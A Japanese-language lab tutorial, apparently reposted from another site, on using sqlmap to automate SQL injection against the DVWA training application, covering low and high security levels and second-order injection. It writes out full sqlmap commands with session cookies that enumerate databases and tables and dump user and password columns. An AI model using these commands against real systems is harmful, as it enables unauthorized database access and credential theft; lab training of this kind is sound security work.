ホームページ  >  記事  >  運用・保守  >  Sqlmap 自動インジェクションのサンプル分析

Sqlmap 自動インジェクションのサンプル分析

WBOY
WBOY転載
2023-05-13 15:31:131148ブラウズ

sqlmap を使用して dvwa のインジェクションを自動化する
dvwa レベルを low に設定します

  1. dvwa の SQL インジェクションを開きます (SQL インジェクション (ブラインド)#) ## )、ブラウザーのデバッグを開き、ユーザー ID を入力して送信し、傍受されたリクエストを表示します。

  2. これは GET リクエストであることがわかります。URL「http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit」 #"


  3. これを salmap に直接入れてテストしてみます。 -u コマンドを使用します。 -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id =1&Submit=Submit# "


  4. ここでログインする必要があることがわかります。ログインしないと脱出できません。したがって、ログインを維持するために cookie を追加する必要があります


6. burp スイート プロキシを使用してパケットをキャプチャし、ログイン cookie を取得し、 --dbs バースト データ -u "http を追加します。 :// 192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" -- cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" --dbs

データベースが展開されたのは mysql

7. -D xxx を使用して表示するデータベースを指定し、--tables を使用してデータベース内のすべてのテーブルを表示します。 -u "http://192.168.1.222:8089/ vulnerabilities/sqli/?id=1&Submit= Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa --tables

実行結果を表示します:

8。 -D xxx -T ttt を使用します。表示するテーブルを指定します。テーブルの列を表示するには --columns を使用します。

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id =1&Submit=Submit#" --cookie="PHPSESSID =0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users --columns

9. データベースを表示するには -D xxx を使用し、-T xxx は表示するテーブル、およびテーブルの列を表示するには -C xxx -dump 列データの表示

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit= Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users -C password,user --dump

  • dvwa セキュリティ レベルを調整するキャプチャしたデータ パケットを .txt ファイルとして保存し、sqlmap ディレクトリに直接 -r ファイル名 --dbs を配置します (後続のパラメータは自分で追加できます)


  • ##dvwa セキュリティ レベルを高に調整します。今回の投稿ページは結果を返すページと同じページではないため、ここでは前の方法は使用できません。第 2 レベルの注入メソッドを使用するには

  • データを送信する URL

  • 返された URL

  • キャプチャしたデータ パケットを .txt ファイルとして保存し、ディレクトリに置きます。次に、データベースを展開します。コマンド:
-r 1.txt --second-url

"http://192.168.1.222:8089/vulnerabilities/sqli/" --バッチ - レベル2 - dbs

#- R 1.txt- -second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" - -batch --level 2 -D dvwa --tables

## - "http://192.168.1.222:8089/vulnerabilities/sqli/"

-- バッチ --レベル 2 -D dvwa -T ユーザー -- columns

フィールド データを展開します

-r 1. txt --second-url " http://192.168.1.222:8089/vulnerabilities/sqli/" --batch --level 2 -D dvwa -T users -C user,password --dump

いくつかの概念的な問題:

##二次注入: Second-order

sql注入-- Second-order インジェクションポイントで入力されたデータが返されるとき、結果が現在のページではなく別のページになる場合があります。このとき、指定する必要があります。どのページで応答を取得し、それが true か false かを判断します。 –second-url の後に、返されたページの URL アドレスが続きます

  • --batch: 自動デフォルト設定、手動で [はい] または [いいえ] を押す必要はありません

  • level:Sqlmap には合計 5 つの検出レベルがあり、デフォルトは 1 です。レベルが高くなるほど、検出中に使用されるペイロードが増えます。このうち、レベル 5 はペイロードが最も多く、Cookie や XFF などのヘッダーを自動的にクラックして挿入します。もちろん、レベルが高くなるほど、検出時間は遅くなります。このパラメータはテストの注入ポイントに影響します。GET データと POST データがテストされます。レベルが 2 の場合、HTTP Cookie がテストされます。レベル 3 の場合、HTTP ユーザー エージェント/リファラー ヘッダーがテストされます。どのパラメータが注入ポイントであるかわからない場合は、精度を確保するためにレベル 5 に設定することをお勧めします (速度も遅くなります)

以上がSqlmap 自動インジェクションのサンプル分析の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

声明:
この記事はyisu.comで複製されています。侵害がある場合は、admin@php.cn までご連絡ください。